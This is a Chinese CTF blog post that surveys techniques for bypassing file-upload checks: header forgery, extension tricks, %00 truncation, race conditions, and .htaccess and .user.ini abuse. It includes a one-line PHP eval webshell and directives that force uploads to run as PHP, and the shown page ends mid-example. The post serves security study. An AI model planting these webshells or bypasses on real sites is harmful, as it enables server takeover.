<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="文件上传漏洞 大部分是需要回显储存路径才能打后续操作的，如果没有回显路径要不再想想。？(雾)  前端检测">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞">
<meta property="og:url" content="https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="文件上传漏洞 大部分是需要回显储存路径才能打后续操作的，如果没有回显路径要不再想想。？(雾)  前端检测">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250416151018927.png">
<meta property="og:image" content="https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/kisakiayano/source/_posts/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/8d6872811ad6ca771a0debab4f7a50ce.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194656774-1403436835.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194716298-1059932045.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194746793-602361880.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250417211410728.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250418083343333.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250418083404184.png">
<meta property="og:image" content="https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/kisakiayano/source/_posts/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/1964477-20200308194604304-1865593941.png">
<meta property="article:published_time" content="2025-01-25T05:24:16.000Z">
<meta property="article:modified_time" content="2025-07-06T09:08:50.240Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="-CTF -Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250416151018927.png">


<link rel="canonical" href="https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/","path":"2025/01/25/文件上传漏洞/","title":"文件上传漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>文件上传漏洞 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text"> 文件上传漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%AB%AF%E6%A3%80%E6%B5%8B"><span class="nav-number">1.1.</span> <span class="nav-text"> 前端检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E7%AB%AF%E6%A3%80%E6%B5%8B"><span class="nav-number">1.2.</span> <span class="nav-text"> 后端检测</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A3%80%E6%B5%8Bcontent-type"><span class="nav-number">1.2.1.</span> <span class="nav-text"> 检测content-type</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E5%A4%B4%E5%88%A4%E6%96%AD%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.2.2.</span> <span class="nav-text"> 检测文件头判断文件类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%8E%E7%AB%AF%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E6%8B%93%E5%B1%95%E5%90%8D"><span class="nav-number">1.2.3.</span> <span class="nav-text"> 后端检测文件拓展名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%8E%E7%AB%AF%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9"><span class="nav-number">1.2.4.</span> <span class="nav-text"> 后端检测文件内容</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E6%9B%BF%E6%8D%A2"><span class="nav-number">1.2.4.1.</span> <span class="nav-text"> 文件内容替换</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%BE%E7%89%87%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93"><span class="nav-number">1.2.4.2.</span> <span class="nav-text"> 图片二次渲染</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="nav-number">1.2.5.</span> <span class="nav-text"> 条件竞争</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#waf"><span class="nav-number">1.3.</span> <span class="nav-text"> WAF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0htaccess%E6%96%87%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="nav-number">1.3.1.</span> <span class="nav-text"> 上传.htaccess文件绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0userini%E6%96%87%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="nav-number">1.3.2.</span> <span class="nav-text"> 上传.user.ini文件绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A5%87%E5%A5%87%E6%80%AA%E6%80%AA%E7%9A%84%E7%BB%95%E8%BF%87"><span class="nav-number">1.3.3.</span> <span class="nav-text"> 奇奇怪怪的绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ngnix%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.4.</span> <span class="nav-text"> Ngnix解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.4.1.</span> <span class="nav-text"> 文件解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E5%AD%97%E8%8A%82rce"><span class="nav-number">1.4.2.</span> <span class="nav-text"> 空字节RCE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cve-2013-45472000"><span class="nav-number">1.4.3.</span> <span class="nav-text"> CVE-2013-4547(%20%00)</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.5.</span> <span class="nav-text"> Apache解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.5.1.</span> <span class="nav-text"> 文件名解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#htaccess%E6%96%87%E4%BB%B6"><span class="nav-number">1.5.2.</span> <span class="nav-text"> .htaccess文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.5.2.1.</span> <span class="nav-text"> </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#cgi%E5%90%AF%E5%8A%A8%E6%96%B9%E5%BC%8F%E5%88%A9%E7%94%A8"><span class="nav-number">1.5.2.2.</span> <span class="nav-text"> CGI启动方式利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#fastcgi%E5%88%A9%E7%94%A8"><span class="nav-number">1.5.2.3.</span> <span class="nav-text"> FastCGI利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%88%A9%E7%94%A8"><span class="nav-number">1.5.2.4.</span> <span class="nav-text"> 文件包含利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A3%E7%BB%8F%E5%86%99%E5%85%A5"><span class="nav-number">1.5.2.5.</span> <span class="nav-text"> 正经写入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cve-2017-15715"><span class="nav-number">1.5.3.</span> <span class="nav-text"> CVE-2017-15715</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="nav-number">1.5.4.</span> <span class="nav-text"> 目录遍历</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lighttpd"><span class="nav-number">1.5.5.</span> <span class="nav-text"> lighttpd</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#iis"><span class="nav-number">1.6.</span> <span class="nav-text"> IIS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%9E%90%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9Etestasp1jpg"><span class="nav-number">1.6.1.</span> <span class="nav-text"> 解析目录解析漏洞(&#x2F;test.asp&#x2F;1.jpg)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9Etestaspjpg"><span class="nav-number">1.6.2.</span> <span class="nav-text"> 文件名解析漏洞(test.asp;.jpg)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%95%B8%E5%BD%A2%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9Etestjpgphp"><span class="nav-number">1.6.3.</span> <span class="nav-text"> 畸形解析漏洞(test.jpg&#x2F;*.php)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.6.4.</span> <span class="nav-text"> 其他解析漏洞</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="文件上传漏洞 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件上传漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-01-25 13:24:16" itemprop="dateCreated datePublished" datetime="2025-01-25T13:24:16+08:00">2025-01-25</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-07-06 17:08:50" itemprop="dateModified" datetime="2025-07-06T17:08:50+08:00">2025-07-06</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>9k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>16 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="文件上传漏洞"><a class="markdownIt-Anchor" href="#文件上传漏洞"></a> 文件上传漏洞</h1>
<p>大部分是需要回显储存路径才能打后续操作的，如果没有回显路径要不再想想。？(雾)</p>
<h2 id="前端检测"><a class="markdownIt-Anchor" href="#前端检测"></a> 前端检测</h2>
<p>前端检测上传文件的后缀，js检测直接禁用js</p>
<h2 id="后端检测"><a class="markdownIt-Anchor" href="#后端检测"></a> 后端检测</h2>
<h3 id="检测content-type"><a class="markdownIt-Anchor" href="#检测content-type"></a> 检测content-type</h3>
<p>检测你发包的Content-Type参数来判断文件上传类型</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250416151018927.png" alt="image-20250416151018927"></p>
<p>一般你改一下content-type就可以绕过了</p>
<h3 id="检测文件头判断文件类型"><a class="markdownIt-Anchor" href="#检测文件头判断文件类型"></a> 检测文件头判断文件类型</h3>
<p>字义，使用getimagesize()函数来获取文件的MIME类型，此时检测的不是数据包中的content-type，而是文件头</p>
<p>这种时候伪造一下就可以</p>
<pre><code class="highlight scss"><span class="built_in">gif</span>(GIF89a) : <span class="number">47</span> <span class="number">49</span> <span class="number">46</span> <span class="number">38</span> <span class="number">39</span> <span class="number">61</span> 
jpg、jpeg : FF D8 FF 
png : <span class="number">89</span> <span class="number">50</span> <span class="number">4</span>E <span class="number">47</span> <span class="number">0</span>D <span class="number">0</span>A</code></pre>
<p>用winhex、010editor等十六进制处理工具，在数据最前面添加图片的文件头，从而绕过检测，或者你直接在包的头写个GIF89a也是可以过的</p>
<h3 id="后端检测文件拓展名"><a class="markdownIt-Anchor" href="#后端检测文件拓展名"></a> 后端检测文件拓展名</h3>
<p>用拓展名的黑名单来检测文件拓展名从而防止危险文件的上传</p>
<p>绕过:</p>
<p>1)使用一些特殊扩展名来绕过,<code>php</code>可以用php3、php4、php5代替</p>
<p>2)大小写混淆绕过</p>
<p>3)在文件名后加<code>.</code>(空格，点，空格)，利用windows特性绕过</p>
<p>4)在文件名后加<code>::$data</code>绕过(<strong>NTFS流</strong>读入)</p>
<p>5)有替换的话可以双写绕过</p>
<hr>
<p>当然也可以是白名单只让特定的文件上传</p>
<p>绕过:</p>
<p>存储路径可以使用%00在最后进行截断，（注意：GET型可以对%00自动解码，但POST型不能，需要在二进制中修改//打开你的010喵，用空格占个位来输00）</p>
<h3 id="后端检测文件内容"><a class="markdownIt-Anchor" href="#后端检测文件内容"></a> 后端检测文件内容</h3>
<h4 id="文件内容替换"><a class="markdownIt-Anchor" href="#文件内容替换"></a> 文件内容替换</h4>
<p>检测原理：</p>
<p>在后端处理上传的文件时，会将将文件中的敏感字符替换掉。<br>
参考代码</p>
<pre><code class="highlight php"><span class="meta">&lt;?php</span>
<span class="variable">$path</span> = <span class="string">&quot;./uploads&quot;</span>;
<span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;myfile&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>]);
<span class="variable">$content</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;!&#x27;</span>, <span class="variable">$content</span>);
<span class="variable">$file</span> = <span class="variable">$path</span> . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$_FILES</span>[<span class="string">&#x27;myfile&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];

<span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;myfile&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="variable">$file</span>)) &#123;
        <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$file</span>, <span class="variable">$content</span>);
        <span class="keyword">echo</span> <span class="string">&#x27;Success!&lt;br&gt;&#x27;</span>;
&#125; <span class="keyword">else</span> &#123;
        <span class="keyword">echo</span> <span class="string">&#x27;Error!&lt;br&gt;&#x27;</span>;
&#125;
<span class="meta">?&gt;</span></code></pre>
<p>绕过方法：<br>
根据实际过滤的字符来判断，（一般不会限制所有敏感字符，因为还要兼顾图片上传）</p>
<h4 id="图片二次渲染"><a class="markdownIt-Anchor" href="#图片二次渲染"></a> 图片二次渲染</h4>
<p>检测原理：<br>
后端调用了<code>php</code>的GD库，提取了文件中的图片数据，然后再重新渲染，这样图片中插入的恶意代码就会被过滤掉了</p>
<p>绕过方法：<br>
比较过滤前后文件内容，一般不会全部过滤。<br>
比较使用<code>php-gd</code>转换之前和之后的gif图像，并搜索它们之间的任何相似性，因此，如果我在原始文件中找到相似的部分，则在使用<code>php-gd</code>转换后也保留了该部分然后我可以在那部分注入我的PHP代码并获得RCE</p>
<h3 id="条件竞争"><a class="markdownIt-Anchor" href="#条件竞争"></a> 条件竞争</h3>
<p>该漏洞形成逻辑：<br>
网站允许上传文件，然后检查上传文件是否包含<code>webshell</code>、是否是指定的文件类型。如果不是，那么删除该文件。在删除之前访问上传的<code>php</code>文件，从而执行上传文件中的<code>php</code>代码。</p>
<p>绕过方法：<br>
先进行文件上传，后进行判断与删除。利用时间差进行<code>webshell</code>上传。<br>
竞争条件代码举例：</p>
<pre><code class="highlight php"><span class="meta">&lt;?php</span>
	<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php @eval($\_POST\[&quot;cmd&quot;\])?&gt;&#x27;</span>);
<span class="meta">?&gt;</span></code></pre>
<p>判断是否删除</p>
<pre><code class="highlight python"><span class="keyword">import</span> requests  
<span class="keyword">while</span> true:  
	requests.get(”路径“)</code></pre>
<h2 id="waf"><a class="markdownIt-Anchor" href="#waf"></a> WAF</h2>
<p>当文件完全被ban，只用以图片类型上传的时候，我们该怎么办呢</p>
<h3 id="上传htaccess文件绕过"><a class="markdownIt-Anchor" href="#上传htaccess文件绕过"></a> 上传.htaccess文件绕过</h3>
<p><code>.htaccess</code>文件是一个纯文本文件，它里面存放着Apache服务器配置相关的指令。</p>
<p><code>.htaccess</code>主要的作用有：URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。</p>
<p><code>.htaccess</code>的用途范围主要针对当前目录</p>
<p>类似内容</p>
<pre><code class="highlight plaintext">ForceType application/x-httpd-php
SetHandler application/x-httpd-php
这些都会把上传的文件强制解析为php</code></pre>
<h3 id="上传userini文件绕过"><a class="markdownIt-Anchor" href="#上传userini文件绕过"></a> 上传.user.ini文件绕过</h3>
<p><code>.user.ini</code>。它比<code>.htaccess</code>用的更广，不管是<code>nginx/apache/IIS</code>，只要是以<strong>fastcgi</strong>运行的<code>php</code>都可以用这个方法。</p>
<p>那么什么是<code>.user.ini</code>？这得从<code>php.ini</code>说起了。<code>php.ini</code>是<code>php</code>默认的配置文件，其中包括了很多<code>php</code>的配置，这些配置中，又分为几种：<em>PHP_INI_SYSTEM</em>、<em>PHP_INI_PERDIR</em>、<em>PHP_INI_ALL</em>、<em>PHP_INI_USER</em>。在此可以查看：<a target="_blank" rel="noopener" href="http://php.net/manual/zh/ini.list.php">http://php.net/manual/zh/ini.list.php</a> 这几种模式有什么区别？看看官方的解释：</p>
<p><img src="/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/kisakiayano/source/_posts/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/8d6872811ad6ca771a0debab4f7a50ce.png" alt="img"></p>
<p>除了主 <code>php.ini </code>之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（<code>$_SERVER['DOCUMENT_ROOT']</code> 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。</p>
<p>在 <code>.user.ini</code> 风格的 INI 文件中只有具有 <code>PHP_INI_PERDIR</code> 和 <code>PHP_INI_USER</code> 模式的 INI 设置可被识别。</p>
<p>所以除了<code>PHP_INI_SYSTEM</code>以外的模式（包括<code>PHP_INI_ALL</code>）都是可以通过<code>.user.ini</code>来设置的。我们可以很容易地借助<code>.user.ini</code>文件，更改<code>auto_prepend_file</code>配置项，来构造一个“后门”。</p>
<p>比如，某网站限制不允许上传<code>.php</code>文件，你便可以上传一个<code>.user.ini</code>，再上传一个图片马，包含起来进行<code>getshell</code>。不过前提是含有<code>.user.ini</code>的文件夹下需要有正常的<code>php</code>文件，否则也不能包含了。再比如，你只是想隐藏个后门，这个方式是最方便的。</p>
<p>实例([SUCTF 2019]CheckIn1):</p>
<pre><code class="highlight javascript">$userdir = <span class="string">&quot;uploads/&quot;</span> . <span class="title function_">md5</span>($_SERVER[<span class="string">&quot;REMOTE_ADDR&quot;</span>]);
<span class="keyword">if</span> (!<span class="title function_">file_exists</span>($userdir)) &#123;
    <span class="title function_">mkdir</span>($userdir, <span class="number">0777</span>, <span class="literal">true</span>);
&#125;
<span class="title function_">file_put_contents</span>($userdir . <span class="string">&quot;/index.php&quot;</span>, <span class="string">&quot;&quot;</span>);
<span class="keyword">if</span> (<span class="title function_">isset</span>($_POST[<span class="string">&quot;upload&quot;</span>])) &#123;
    $tmp_name = $_FILES[<span class="string">&quot;fileUpload&quot;</span>][<span class="string">&quot;tmp_name&quot;</span>];
    $name = $_FILES[<span class="string">&quot;fileUpload&quot;</span>][<span class="string">&quot;name&quot;</span>];
    <span class="keyword">if</span> (!$tmp_name) &#123;
        <span class="title function_">die</span>(<span class="string">&quot;filesize too big!&quot;</span>);
    &#125;
    <span class="keyword">if</span> (!$name) &#123;
